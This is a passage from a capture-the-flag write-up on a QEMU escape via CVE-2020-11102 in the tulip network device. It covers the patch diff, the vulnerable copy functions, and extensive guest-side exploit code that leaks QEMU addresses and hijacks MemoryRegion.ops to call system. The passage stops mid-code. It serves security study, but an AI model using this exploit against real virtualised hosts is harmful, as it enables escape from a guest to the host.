
qemu escape + CVE-2020-11102

Reproducing EscapefromtheEarth

#!/bin/sh

./qemu-system-x86_64 -L ./dependency -kernel ./vmlinuz-4.15.0-208-generic -initrd ./rootfs.cpio -cpu kvm64,+smep \
-m 64M \
-monitor none \
-device tulip \
-append "root=/dev/ram rw console=ttyS0 oops=panic panic=1 quiet kaslr" \
-nographic
#!/bin/sh
mount -t proc none /proc
mount -t sysfs none /sys
/sbin/mdev -s
insmod /tulip.ko
exec /bin/sh

Booting the kernel, we find we already have root:

/ # whoami
root
/ # id
uid=0(root) gid=0
  • The challenge ships qemu-system-x86_64, so it is almost certainly a QEMU escape

Vulnerability Analysis

QEMU escape bugs usually appear in one of the following four handlers:

  • pmio_read: read a device register via port I/O (triggered from the guest with in())
  • pmio_write: write a device register via port I/O (triggered from the guest with out())
  • mmio_read: read a device register via memory-mapped I/O (mmap the corresponding physical memory and read from the mapping)
  • mmio_write: write a device register via memory-mapped I/O (mmap the corresponding physical memory and write to the mapping; a user-space trigger sketch follows this list)
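
For reference, here is a minimal user-space sketch (not part of the challenge files) of how these handlers are usually triggered from inside the guest. The PCI sysfs path and register offsets are placeholders that must be adapted to the actual device; the 0xc000 port base matches this challenge's BAR0 as shown by info pci later in this post.

#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/io.h>
#include <sys/mman.h>
#include <unistd.h>

#define PMIO_BASE 0xc000 /* port I/O base of the device (BAR0) */

int main(void) {
    /* pmio: raise the I/O privilege level, then in/out instructions land in
       the device's pmio_read/pmio_write handlers */
    if (iopl(3) != 0) { perror("iopl"); exit(1); }
    outl(0xdeadbeef, PMIO_BASE + 0x0);                  /* pmio write */
    printf("pmio read: 0x%x\n", inl(PMIO_BASE + 0x0));  /* pmio read */

    /* mmio: map the memory BAR exposed through sysfs, then plain loads and
       stores on the mapping land in mmio_read/mmio_write (path is an example) */
    int fd = open("/sys/bus/pci/devices/0000:00:04.0/resource1", O_RDWR | O_SYNC);
    if (fd < 0) { perror("open"); exit(1); }
    volatile uint32_t *mmio = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE,
                                   MAP_SHARED, fd, 0);
    if (mmio == MAP_FAILED) { perror("mmap"); exit(1); }
    mmio[0] = 0xdeadbeef;                               /* mmio write */
    printf("mmio read: 0x%x\n", mmio[0]);               /* mmio read */
    return 0;
}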

However, this challenge does not register any custom mmio/pmio handlers of its own; the clues it provides point to CVE-2020-11102, along with the QEMU build steps:

wget https://download.qemu.org/qemu-4.2.0.tar.xz
xz -d ./qemu-4.2.0.tar.xz
tar -xvf ./qemu-4.2.0.tar
cp ./tulip.c ./qemu-4.2.0/hw/net/
#Then build qemu as normal
...
  • hw/net/tulip.c in QEMU 4.2.0 contains a buffer overflow vulnerability
  • An attacker can exploit it to crash the QEMU process or possibly execute arbitrary code with the privileges of the QEMU process

So we download the QEMU 4.2.1 source and diff it to see what was changed:

--- tulip.c	2023-03-29 14:50:12.000000000 +0800
+++ tulip2.c 2020-06-26 02:12:17.000000000 +0800
@@ -38,9 +38,9 @@

uint8_t rx_frame[2048];
uint8_t tx_frame[2048];
- int tx_frame_len;
- int rx_frame_len;
- int rx_frame_size;
+ uint16_t tx_frame_len;
+ uint16_t rx_frame_len;
+ uint16_t rx_frame_size;

uint32_t rx_status;
uint8_t filter[16][6];
@@ -58,9 +58,9 @@
VMSTATE_UINT64(current_tx_desc, TULIPState),
VMSTATE_BUFFER(rx_frame, TULIPState),
VMSTATE_BUFFER(tx_frame, TULIPState),
- VMSTATE_INT32(rx_frame_len, TULIPState),
- VMSTATE_INT32(tx_frame_len, TULIPState),
- VMSTATE_INT32(rx_frame_size, TULIPState),
+ VMSTATE_UINT16(rx_frame_len, TULIPState),
+ VMSTATE_UINT16(tx_frame_len, TULIPState),
+ VMSTATE_UINT16(rx_frame_size, TULIPState),
VMSTATE_UINT32(rx_status, TULIPState),
VMSTATE_UINT8_2DARRAY(filter, TULIPState, 16, 6),
VMSTATE_END_OF_LIST()
@@ -170,6 +170,7 @@
} else {
len = s->rx_frame_len;
}
+
pci_dma_write(&s->dev, desc->buf_addr1, s->rx_frame +
(s->rx_frame_size - s->rx_frame_len), len);
s->rx_frame_len -= len;
@@ -181,6 +182,7 @@
} else {
len = s->rx_frame_len;
}
+
pci_dma_write(&s->dev, desc->buf_addr2, s->rx_frame +
(s->rx_frame_size - s->rx_frame_len), len);
s->rx_frame_len -= len;
@@ -227,7 +229,8 @@

trace_tulip_receive(buf, size);

- if (size < 14 || size > 2048 || tulip_rx_stopped(s)) {
+ if (size < 14 || size > sizeof(s->rx_frame) - 4
+ || s->rx_frame_len || tulip_rx_stopped(s)) {
return 0;
}

@@ -275,7 +278,6 @@
return tulip_receive(qemu_get_nic_opaque(nc), buf, size);
}

-
static NetClientInfo net_tulip_info = {
.type = NET_CLIENT_DRIVER_NIC,
.size = sizeof(NICState),
@@ -558,7 +560,7 @@
if ((s->csr[6] >> CSR6_OM_SHIFT) & CSR6_OM_MASK) {
/* Internal or external Loopback */
tulip_receive(s, s->tx_frame, s->tx_frame_len);
- } else {
+ } else if (s->tx_frame_len <= sizeof(s->tx_frame)) {
qemu_send_packet(qemu_get_queue(s->nic),
s->tx_frame, s->tx_frame_len);
}
@@ -570,23 +572,31 @@
}
}

-static void tulip_copy_tx_buffers(TULIPState *s, struct tulip_descriptor *desc)
+static int tulip_copy_tx_buffers(TULIPState *s, struct tulip_descriptor *desc)
{
int len1 = (desc->control >> TDES1_BUF1_SIZE_SHIFT) & TDES1_BUF1_SIZE_MASK;
int len2 = (desc->control >> TDES1_BUF2_SIZE_SHIFT) & TDES1_BUF2_SIZE_MASK;

+ if (s->tx_frame_len + len1 > sizeof(s->tx_frame)) {
+ return -1;
+ }
if (len1) {
pci_dma_read(&s->dev, desc->buf_addr1,
s->tx_frame + s->tx_frame_len, len1);
s->tx_frame_len += len1;
}

+ if (s->tx_frame_len + len2 > sizeof(s->tx_frame)) {
+ return -1;
+ }
if (len2) {
pci_dma_read(&s->dev, desc->buf_addr2,
s->tx_frame + s->tx_frame_len, len2);
s->tx_frame_len += len2;
}
desc->status = (len1 + len2) ? 0 : 0x7fffffff;
+
+ return 0;
}

static void tulip_setup_filter_addr(TULIPState *s, uint8_t *buf, int n)
@@ -651,13 +661,15 @@

static void tulip_xmit_list_update(TULIPState *s)
{
+#define TULIP_DESC_MAX 128
+ uint8_t i = 0;
struct tulip_descriptor desc;

if (tulip_ts(s) != CSR5_TS_SUSPENDED) {
return;
}

- for (;;) {
+ for (i = 0; i < TULIP_DESC_MAX; i++) {
tulip_desc_read(s, s->current_tx_desc, &desc);
tulip_dump_tx_descriptor(s, &desc);

@@ -675,10 +687,10 @@
s->tx_frame_len = 0;
}

- tulip_copy_tx_buffers(s, &desc);
-
- if (desc.control & TDES1_LS) {
- tulip_tx(s, &desc);
+ if (!tulip_copy_tx_buffers(s, &desc)) {
+ if (desc.control & TDES1_LS) {
+ tulip_tx(s, &desc);
+ }
}
}
tulip_desc_write(s, s->current_tx_desc, &desc);

We can see that tulip_copy_tx_buffers is missing a bounds check; the core code is as follows:

if (len1) {
pci_dma_read(&s->dev, desc->buf_addr1,
s->tx_frame + s->tx_frame_len, len1);
s->tx_frame_len += len1;
}

if (len2) {
pci_dma_read(&s->dev, desc->buf_addr2,
s->tx_frame + s->tx_frame_len, len2);
s->tx_frame_len += len2;
}
desc->status = (len1 + len2) ? 0 : 0x7fffffff;
  • tulip_copy_tx_buffers is part of QEMU's tulip device emulation; it copies the data described by the guest driver's descriptors into the adapter's buffer
  • When tulip_copy_tx_buffers is called repeatedly, s->tx_frame_len can grow to a very large value (a toy model of the unchecked growth is sketched after this list)
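
To make the unchecked growth concrete, here is a small self-contained toy model (not QEMU code) of the arithmetic: the write cursor tx_frame_len just keeps advancing, so from the third 0x400-byte descriptor onward the copy lands past the 2048-byte buffer.

#include <stdint.h>
#include <stdio.h>

/* Toy model of the bug: tx_frame_len is never compared against
   sizeof(tx_frame), so repeated descriptors move the write cursor past the
   end of the buffer (we only print the offsets instead of really writing). */
struct toy_state {
    uint8_t tx_frame[2048];
    int tx_frame_len;
};

static void toy_copy_tx_buffers(struct toy_state *s, int len1)
{
    printf("write 0x%x bytes at tx_frame + 0x%x%s\n", len1, s->tx_frame_len,
           s->tx_frame_len + len1 > (int)sizeof(s->tx_frame) ? "  <-- out of bounds" : "");
    s->tx_frame_len += len1; /* unchecked, exactly like the vulnerable code */
}

int main(void)
{
    struct toy_state s = { .tx_frame_len = 0 };
    for (int i = 0; i < 4; i++)
        toy_copy_tx_buffers(&s, 0x400); /* four descriptors of 0x400 bytes each */
    return 0;
}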

Because the length fields supplied by the guest are never validated, out-of-bounds writes occur on tx_frame and rx_frame, both of which are members of the TULIPState structure:

typedef struct TULIPState
{
PCIDevice dev; /* PCI device state, holding the device's hardware information */
MemoryRegion io; /* memory region describing the device's I/O (port) address space */
MemoryRegion memory; /* memory region describing the device's memory (MMIO) address space */
NICConf c;
qemu_irq irq; /* interrupt line used by the network adapter */
NICState *nic;
eeprom_t *eeprom;
uint32_t csr[16]; /* array of 16 32-bit registers holding the adapter's CSR values */

/* state for MII */
uint32_t old_csr9;
uint32_t mii_word;
uint32_t mii_bitcnt;

hwaddr current_rx_desc; /* hardware (guest physical) address of the current RX descriptor */
hwaddr current_tx_desc; /* hardware (guest physical) address of the current TX descriptor */

uint8_t rx_frame[2048]; /* receive buffer holding incoming data */
uint8_t tx_frame[2048]; /* transmit buffer holding data to be sent */
int tx_frame_len; /* amount of data accumulated in tx_frame */
int rx_frame_len; /* amount of data still to be delivered from rx_frame */
int rx_frame_size; /* size of the frame held in rx_frame */

uint32_t rx_status; /* receive status register */
uint8_t filter[16][6]; /* 16 x 6 array holding the MAC address filter */
} TULIPState;

Program Analysis

We cannot find a device node for tulip.ko in this challenge:

/ # find . -name tulip
./sys/bus/pci/drivers/tulip
./sys/module/tulip

IDA shows that tulip.ko only registers a driver and never registers a device node. (In fact, unlike kernel challenges, QEMU escape challenges usually do not need a device node at all.)

__int64 __fastcall tulip_init(__int64 a1, __int64 a2)
{
_fentry__(a1, a2);
printk(&unk_94CF, version);
if ( !csr0 )
{
printk(&unk_A6F0, version);
csr0 = 0xA04800;
}
tulip_rx_copybreak = rx_copybreak;
tulip_max_interrupt_work = max_interrupt_work;
return _pci_register_driver(&tulip_driver, &_this_module, "tulip");
}

First, use info pci to list QEMU's PCI devices:

Bus  0, device   4, function 0:
Ethernet controller: PCI device 1011:0019
PCI subsystem 103c:104f
IRQ 11.
BAR0: I/O at 0xc000 [0xc07f].
BAR1: 32 bit memory at 0xfebf1000 [0xfebf107f].
id ""
  • First add the -monitor telnet:127.0.0.1:4444,server,nowait option to run.sh
  • Then connect with nc 127.0.0.1 4444 and run info pci to inspect the devices

Based on the 0xc000 port base, we can use pmio to reach tulip_read and tulip_write:

static const MemoryRegionOps tulip_ops = {
.read = tulip_read,
.write = tulip_write,
.endianness = DEVICE_LITTLE_ENDIAN,
.impl = {
.min_access_size = 4,
.max_access_size = 4,
},
};

tulip_write is fairly complex, so we only analyze the parts we need:

#define CSR6_FC         BIT(12)
#define CSR6_ST BIT(13)

static void tulip_write(void *opaque, hwaddr addr,
uint64_t data, unsigned size)
{
TULIPState *s = opaque;
trace_tulip_reg_write(addr, tulip_reg_name(addr), size, data);

switch (addr)
{
......

case CSR(3):
s->csr[3] = data & ~3ULL;
s->current_rx_desc = s->csr[3]; /* set the hardware address of the RX descriptor */
qemu_flush_queued_packets(qemu_get_queue(s->nic)); /* flush the NIC's packet queue */
break;

case CSR(4):
s->csr[4] = data & ~3ULL;
s->current_tx_desc = s->csr[4]; /* set the hardware address of the TX descriptor */
tulip_xmit_list_update(s); /* indirectly calls the vulnerable function */
break;

case CSR(5):
/* Status register, write clears bit */
s->csr[5] &= ~(data & (CSR5_TI | CSR5_TPS | CSR5_TU | CSR5_TJT |
CSR5_LNP_ANC | CSR5_UNF | CSR5_RI | CSR5_RU |
CSR5_RPS | CSR5_RWT | CSR5_ETI | CSR5_GTE |
CSR5_LNF | CSR5_FBE | CSR5_ERI | CSR5_AIS |
CSR5_NIS | CSR5_GPI | CSR5_LC));
tulip_update_int(s);
break;

case CSR(6):
s->csr[6] = data;
if (s->csr[6] & CSR6_SR)
{
tulip_update_rs(s, CSR5_RS_RUNNING_WAIT_RECEIVE);
qemu_flush_queued_packets(qemu_get_queue(s->nic));
}
else
{
tulip_update_rs(s, CSR5_RS_STOPPED);
}

if (s->csr[6] & CSR6_ST)
{
tulip_update_ts(s, CSR5_TS_SUSPENDED);
tulip_xmit_list_update(s); /* indirectly calls the vulnerable function */
}
else
{
tulip_update_ts(s, CSR5_TS_STOPPED);
}
break;

......

default:
qemu_log_mask(LOG_GUEST_ERROR, "%s: write to CSR at unknown address "
"0x%" PRIx64 "\n",
__func__, addr);
break;
}
}

tulip_xmit_list_update calls the vulnerable function indirectly; let's walk through the call chain:

static void tulip_xmit_list_update(TULIPState *s)
{
struct tulip_descriptor desc;

if (tulip_ts(s) != CSR5_TS_SUSPENDED) /* return if the transmitter is not in the suspended state */
{
return;
}

for (;;)
{
tulip_desc_read(s, s->current_tx_desc, &desc); /* read the descriptor at s->current_tx_desc into desc */
tulip_dump_tx_descriptor(s, &desc); /* dump (trace) the TX descriptor */

......

if (desc.control & TDES1_SET)
{
......
}
else
{
......
tulip_copy_tx_buffers(s, &desc); /* call the vulnerable function */
if (desc.control & TDES1_LS)
{
tulip_tx(s, &desc); /* send the accumulated data out */
}
}
tulip_desc_write(s, s->current_tx_desc, &desc);
tulip_next_tx_descriptor(s, &desc);
}
}
static void tulip_copy_tx_buffers(TULIPState *s, struct tulip_descriptor *desc)
{
int len1 = (desc->control >> TDES1_BUF1_SIZE_SHIFT) & TDES1_BUF1_SIZE_MASK;
int len2 = (desc->control >> TDES1_BUF2_SIZE_SHIFT) & TDES1_BUF2_SIZE_MASK;

if (len1)
{
pci_dma_read(&s->dev, desc->buf_addr1,
s->tx_frame + s->tx_frame_len, len1);
/* DMA: copy len1 bytes from guest address desc->buf_addr1 into host memory at tx_frame + tx_frame_len */
s->tx_frame_len += len1;
}

if (len2)
{
pci_dma_read(&s->dev, desc->buf_addr2,
s->tx_frame + s->tx_frame_len, len2);
s->tx_frame_len += len2;
}
desc->status = (len1 + len2) ? 0 : 0x7fffffff;
}

  • The call chain is: tulip_write -> tulip_xmit_list_update -> tulip_copy_tx_buffers -> pci_dma_read
  • The precondition is: tulip_ts(s) == CSR5_TS_SUSPENDED

Once TDES1_LS is set, tulip_tx is called:

static void tulip_tx(TULIPState *s, struct tulip_descriptor *desc)
{
if (s->tx_frame_len) {
if ((s->csr[6] >> CSR6_OM_SHIFT) & CSR6_OM_MASK) {
/* Internal or external Loopback */
tulip_receive(s, s->tx_frame, s->tx_frame_len);
} else {
qemu_send_packet(qemu_get_queue(s->nic),
s->tx_frame, s->tx_frame_len);
}
}

if (desc->control & TDES1_IC) {
s->csr[5] |= CSR5_TI;
tulip_update_int(s);
}
}

  • When the (s->csr[6] >> CSR6_OM_SHIFT) & CSR6_OM_MASK condition holds (loopback mode), tulip_receive is called
static ssize_t tulip_receive(TULIPState *s, const uint8_t *buf, size_t size)
{
struct tulip_descriptor desc;

trace_tulip_receive(buf, size);

if (size < 14 || size > 2048 || tulip_rx_stopped(s)) {
return 0;
}

if (!tulip_filter_address(s, buf)) {
return size;
}

do {
tulip_desc_read(s, s->current_rx_desc, &desc);
tulip_dump_rx_descriptor(s, &desc);

if (!(desc.status & RDES0_OWN)) {
s->csr[5] |= CSR5_RU;
tulip_update_int(s);
return s->rx_frame_size - s->rx_frame_len;
}
desc.status = 0;

if (!s->rx_frame_len) {
s->rx_frame_size = size + 4;
s->rx_status = RDES0_LS |
((s->rx_frame_size & RDES0_FL_MASK) << RDES0_FL_SHIFT);
desc.status |= RDES0_FS;
memcpy(s->rx_frame, buf, size);
s->rx_frame_len = s->rx_frame_size;
}

tulip_copy_rx_bytes(s, &desc); /* copy the received data from rx_frame into the guest-supplied buffers */

if (!s->rx_frame_len) {
desc.status |= s->rx_status;
s->csr[5] |= CSR5_RI;
tulip_update_int(s);
}
tulip_dump_rx_descriptor(s, &desc);
tulip_desc_write(s, s->current_rx_desc, &desc);
tulip_next_rx_descriptor(s, &desc);
} while (s->rx_frame_len);
return size;
}

tulip_copy_rx_bytes does the opposite of tulip_copy_tx_buffers:

static void tulip_copy_rx_bytes(TULIPState *s, struct tulip_descriptor *desc)
{
int len1 = (desc->control >> RDES1_BUF1_SIZE_SHIFT) & RDES1_BUF1_SIZE_MASK;
int len2 = (desc->control >> RDES1_BUF2_SIZE_SHIFT) & RDES1_BUF2_SIZE_MASK;
int len;

if (s->rx_frame_len && len1)
{
if (s->rx_frame_len > len1)
{
len = len1;
}
else
{
len = s->rx_frame_len;
}
pci_dma_write(&s->dev, desc->buf_addr1, s->rx_frame + (s->rx_frame_size - s->rx_frame_len), len);
/* DMA: write data from host memory at rx_frame + (rx_frame_size - rx_frame_len) back to the guest */
s->rx_frame_len -= len;
}

if (s->rx_frame_len && len2)
{
if (s->rx_frame_len > len2)
{
len = len2;
}
else
{
len = s->rx_frame_len;
}
pci_dma_write(&s->dev, desc->buf_addr2, s->rx_frame + (s->rx_frame_size - s->rx_frame_len), len);
s->rx_frame_len -= len;
}
}
  • tulip_copy_rx_bytes likewise does not check the size range, so data located after rx_frame can be leaked back to guest memory

The key structure tulip_descriptor is defined as follows (a small helper for building its control word is sketched after the definition):

struct tulip_descriptor {
uint32_t status;
uint32_t control;
uint32_t buf_addr1;
uint32_t buf_addr2;
};
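
The control field packs the buffer lengths and flags. Below is a small helper of my own (not from the original code) using the bit positions the exploit in this post relies on: buffer-1 size in bits 0-10, buffer-2 size in bits 11-21, TDES1_FS at bit 29, TDES1_LS at bit 30; bit 24 (descriptor chaining) is kept set throughout, matching the exploit.

#include <stdint.h>

static uint32_t make_tx_control(uint32_t len1, uint32_t len2, int first, int last)
{
    uint32_t ctrl = (len1 & 0x7ff)           /* buffer 1 size */
                  | ((len2 & 0x7ff) << 11)   /* buffer 2 size */
                  | (1UL << 24);             /* chained descriptor, as in the exploit below */
    if (first) ctrl |= 1UL << 29;            /* TDES1_FS: resets s->tx_frame_len */
    if (last)  ctrl |= 1UL << 30;            /* TDES1_LS: makes tulip_xmit_list_update call tulip_tx */
    return ctrl;
}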

Exploitation Strategy

tulip_xmit_list_update reads the NIC descriptor from current_tx_desc:

tulip_desc_read(s, s->current_tx_desc, &desc); /* read the descriptor at s->current_tx_desc into desc */
tulip_dump_tx_descriptor(s, &desc);
  • tulip_desc_read expects a guest physical address here

We can compute the guest physical address via /proc/self/pagemap (a short usage sketch follows these helpers):

fd = open("/proc/self/pagemap", O_RDONLY);
if (fd < 0) {
perror("open");
exit(1);
}

uint32_t page_offset(uint32_t addr) {
return addr & ((1 << PAGE_SHIFT) - 1);
}

uint64_t gva_to_gfn(void *addr) {
uint64_t pme, gfn;
size_t offset;
offset = ((uintptr_t)addr >> 9) & ~7;
lseek(fd, offset, SEEK_SET);
read(fd, &pme, 8);
if (!(pme & PFN_PRESENT))
return -1;
gfn = pme & PFN_PFN;
return gfn;
}

uint64_t gva_to_gpa(void *addr) {
uint64_t gfn = gva_to_gfn(addr);
assert(gfn != -1);
return (gfn << PAGE_SHIFT) | page_offset((uint64_t)addr);
}
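
A minimal usage sketch (assuming the PAGE_SHIFT/PFN_* constants and the pagemap fd from the full exploit at the end of this post): touch the buffer first so the page is resident before translating it.

char *buf = malloc(0x1000);
memset(buf, 'A', 0x1000); /* fault the page in so pagemap reports it as present */
uint64_t buf_gpa = gva_to_gpa(buf); /* guest virtual address -> guest physical address */
printf("[*] buf: gva=%p gpa=0x%lx\n", buf, buf_gpa);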

If we set tx_frame_len to 0x800, the next write into tx_frame[2048] will spill past the end of the array.

Here is the test code:

int len1 = 0x400 << 0;
int len2 = 0 << 11;
tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->control = len2 | len1 | (1UL << 29) | (1UL << 24);
/* (1UL << 29) is TDES1_FS: makes the handler execute "s->tx_frame_len = 0" */
tx_desc->buf_addr1 = gva_to_gpa(buf);
tx_desc->buf_addr2 = 0x180;
printf("[*] desc: 0x%x\n", tx_desc->buf_addr1);

uint64_t tx_desc_gpa = gva_to_gpa(tx_desc);
printf("[*] tx_desc_gpa: 0x%lx\n", tx_desc_gpa);

pmio_writel(CSR(6), 1u << 13); /* (1u << 13) is CSR6_ST: puts the transmitter into CSR5_TS_SUSPENDED */

sleep(1);
pmio_writel(CSR(4), tx_desc_gpa); /* tx_desc is consumed as the NIC descriptor; tx_frame_len becomes 0x400 */

printf("[*] fill tx_frame\n");

sleep(1);
tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->control = len2 | len1 | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(buf);
tx_desc->buf_addr2 = 0x180;
pmio_writel(CSR(4), tx_desc_gpa); /* tx_desc is consumed again; tx_frame_len becomes 0x800 */

Next, we can use pci_dma_read to overwrite the data that follows TULIPState->tx_frame, and then use pci_dma_write to leak data:

printf("[*] clean CSR5\n");
pmio_writel(CSR(5), 0xffffffff);
pmio_write(CSR(6), 0x800 | (1u << 13) | (1u << 1));
/* 0x800: makes "(s->csr[6] >> CSR6_OM_SHIFT) & CSR6_OM_MASK" non-zero (loopback mode), so tulip_tx calls tulip_receive */
/* (1u << 13) is CSR6_ST: puts the transmitter into CSR5_TS_SUSPENDED */
/* (1u << 1) is CSR6_SR: puts the receiver into CSR5_RS_RUNNING_WAIT_RECEIVE */

sleep(1);
printf("[*] OOB write tx_frame_len...\n");

int rx_len1, rx_len2;
rx_len1 = 0x400;
rx_len2 = 0;
rx_desc->status = (1UL << 31) | (1UL << 24); // RDES0_OWN
rx_desc->buf_addr1 = gva_to_gpa(recv_buf);
rx_desc->buf_addr2 = 0x180;
rx_desc->control = rx_len2 | rx_len1 | (1UL << 24) | (1UL << 30);

// set rx descriptor
sleep(1);
uint64_t rx_desc_gpa = gva_to_gpa(rx_desc);
printf("[*] rx_desc_gpa: 0x%lx\n", rx_desc_gpa);
pmio_writel(CSR(3), rx_desc_gpa); /* install rx_desc */

struct oob_data { /* the TULIPState fields that follow tx_frame */
int tx_frame_len;
int rx_frame_len;
int rx_frame_size;

uint32_t rx_status;
uint8_t filter[16][6];
};
len1 = sizeof(struct oob_data);
struct oob_data *oob_data = malloc(sizeof(struct oob_data));
oob_data->tx_frame_len = 0x400 - len1; /* forged so tx_frame_len ends up as 0x400 after the subsequent "+= len1" */
oob_data->rx_frame_len = 0x900;
oob_data->rx_frame_size = 2048*2 + 0x900; /* makes the copy out of rx_frame start out of bounds */
for (int i = 0; i < 16; i++) { // bypass some stuff
oob_data->filter[i][0] = 'A';
oob_data->filter[i][1] = 'A';
oob_data->filter[i][2] = 'A';
oob_data->filter[i][3] = 'A';
oob_data->filter[i][4] = 'A';
oob_data->filter[i][5] = 'A';
}

tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(oob_data);
tx_desc->buf_addr2 = 0x180;
tx_desc->control = len2 | len1 | (1UL << 24) | (1UL << 30);

// set tx descriptor
sleep(1);
pmio_writel(CSR(4), tx_desc_gpa); /* install tx_desc (overwrites the TULIPState fields) */

printf("[+] leak\n");
char *cur = (char *)recv_buf;
for (int i = 0; i < 50; ++i) {
printf("0x%016lx 0x%016lx\n", *(size_t *)cur, *(size_t *)(cur+8));
cur += 16;
}
cur = (char *)recv_buf;
uint64_t qemu_base = ((uint64_t *)cur)[0x1d] - 0x755f9f;
uint64_t heap_base = ((uint64_t *)cur)[22] - 0xe11380;
uint64_t qemu_plt_system = qemu_base+2859620;
uint64_t frame_base = heap_base+0xe0fcf0;
printf("[*] continue...\n");
printf("[+] qemu_base: 0x%lx\n", qemu_base);
printf("[+] heap_base: 0x%lx\n", heap_base);

After leaking qemu_base and heap_base, we can hijack and forge TULIPState->MemoryRegion->MemoryRegionOps to call whatever function we need (a simplified view of the dispatch follows the structure definition):

struct MemoryRegion {
......
const MemoryRegionOps *ops;
......
};
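
To see why this yields code execution: when the guest touches the device's BAR, QEMU looks up the MemoryRegion and invokes ops->write with the opaque pointer that was handed to memory_region_init_io(), which for this device is the TULIPState itself. Below is a rough, simplified stand-in for that dispatch (not the actual QEMU source), with minimal type definitions for illustration only:

#include <stdint.h>

typedef uint64_t hwaddr;

/* Minimal stand-ins for the QEMU types involved */
typedef struct MemoryRegionOps {
    uint64_t (*read)(void *opaque, hwaddr addr, unsigned size);
    void (*write)(void *opaque, hwaddr addr, uint64_t data, unsigned size);
} MemoryRegionOps;

typedef struct MemoryRegion {
    const MemoryRegionOps *ops;
    void *opaque; /* the TULIPState * passed to memory_region_init_io() */
} MemoryRegion;

/* Roughly what happens on a guest pmio/mmio write: once ops points to a
   forged table whose write slot is system@plt, and a command string has been
   planted at the address opaque points to, the next access runs that command. */
static void io_write_dispatch(MemoryRegion *mr, hwaddr addr,
                              uint64_t data, unsigned size)
{
    mr->ops->write(mr->opaque, addr, data, size);
}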

The test code is as follows:

printf("[*] enter stage2\n"); {
len1 = 0x400 << 0;
len2 = 0 << 11;
tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->control = len2 | len1 | (1UL << 29) | (1UL << 24);
/* (1UL << 29) is TDES1_FS: makes the handler execute "s->tx_frame_len = 0" */
tx_desc->buf_addr1 = gva_to_gpa(buf);
tx_desc->buf_addr2 = 0x180;
printf("[*] desc: 0x%x\n", tx_desc->buf_addr1);

uint64_t tx_desc_gpa = gva_to_gpa(tx_desc);
printf("[*] tx_desc_gpa: 0x%lx\n", tx_desc_gpa);

pmio_writel(CSR(6), 1u << 13); /* (1u << 13) is CSR6_ST: puts the transmitter into CSR5_TS_SUSPENDED */

sleep(1);
pmio_writel(CSR(4), tx_desc_gpa); /* tx_desc is consumed as the NIC descriptor; tx_frame_len becomes 0x400 */

printf("[*] fill tx_frame\n");

sleep(1);
tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->control = len2 | len1 | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(buf);
tx_desc->buf_addr2 = 0x180;
pmio_writel(CSR(4), tx_desc_gpa); /* tx_desc is consumed again; tx_frame_len becomes 0x800 */

printf("[*] clean CSR5\n");
pmio_writel(CSR(5), 0xffffffff);

len1 = sizeof(struct oob_data);
struct oob_data *oob_data = malloc(sizeof(struct oob_data));
oob_data->tx_frame_len = -0x3350 - 0x70; /* negative offset: the next DMA read writes before tx_frame */
oob_data->rx_frame_len = 0;
oob_data->rx_frame_size = 0;
for (int i = 0; i < 16; i++) { // bypass some stuff
oob_data->filter[i][0] = 0xff;
oob_data->filter[i][1] = 0xff;
oob_data->filter[i][2] = 0xff;
oob_data->filter[i][3] = 0xff;
oob_data->filter[i][4] = 0xff;
oob_data->filter[i][5] = 0xff;
}

tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(oob_data);
tx_desc->buf_addr2 = 0x180;
tx_desc->control = len2 | len1 | (1UL << 24);

sleep(1);
pmio_writel(CSR(4), tx_desc_gpa); /* install tx_desc (overwrites the TULIPState fields) */

sleep(1);
uint64_t *binsh = (uint64_t *)malloc(0x200);
binsh[0] = 7449354444534473059; // "cat flag" encoded as a little-endian uint64
binsh[1] = 0;
len1 = 16;
len2 = 0;
tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(binsh);
tx_desc->buf_addr2 = 0x180;
tx_desc->control = len2 | len1 | (1UL << 24);
pmio_writel(CSR(4), tx_desc_gpa);
}
printf("[*] enter stage3\n"); {
((uint64_t *)buf)[0] = qemu_plt_system;
((uint64_t *)buf)[1] = qemu_plt_system;

((uint64_t *)buf)[2] = 0;
((uint64_t *)buf)[3] = 0;

((uint64_t *)buf)[4] = 2;
((uint64_t *)buf)[5] = 0;

((uint64_t *)buf)[6] = 0;
((uint64_t *)buf)[7] = 0;

((uint64_t *)buf)[8] = 0x0000000400000004;
((uint64_t *)buf)[9] = 0;

((uint64_t *)buf)[10] = 0;
((uint64_t *)buf)[11] = 0;
len1 = 0x400 << 0;
len2 = 0 << 11;
tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->control = len2 | len1 | (1UL << 29) | (1UL << 24);
/* (1UL << 29) is TDES1_FS: makes the handler execute "s->tx_frame_len = 0" */
tx_desc->buf_addr1 = gva_to_gpa(buf);
tx_desc->buf_addr2 = 0x180;
printf("[*] desc: 0x%x\n", tx_desc->buf_addr1);

uint64_t tx_desc_gpa = gva_to_gpa(tx_desc);
printf("[*] tx_desc_gpa: 0x%lx\n", tx_desc_gpa);

pmio_writel(CSR(6), 1u << 13); /* (1u << 13) is CSR6_ST: puts the transmitter into CSR5_TS_SUSPENDED */

sleep(1);
pmio_writel(CSR(4), tx_desc_gpa); /* tx_desc is consumed as the NIC descriptor; tx_frame_len becomes 0x400 */

printf("[*] fill tx_frame\n");

sleep(1);
tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->control = len2 | len1 | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(buf);
tx_desc->buf_addr2 = 0x180;
pmio_writel(CSR(4), tx_desc_gpa); /* tx_desc is consumed again; tx_frame_len becomes 0x800 */

printf("[*] clean CSR5\n");
pmio_writel(CSR(5), 0xffffffff);

len1 = sizeof(struct oob_data);
struct oob_data *oob_data = malloc(sizeof(struct oob_data));
oob_data->tx_frame_len = -0x2a28-0x70; // offset now points at MemoryRegion.ops
oob_data->rx_frame_len = 0;
oob_data->rx_frame_size = 0;
for (int i = 0; i < 16; i++) { // bypass some stuff
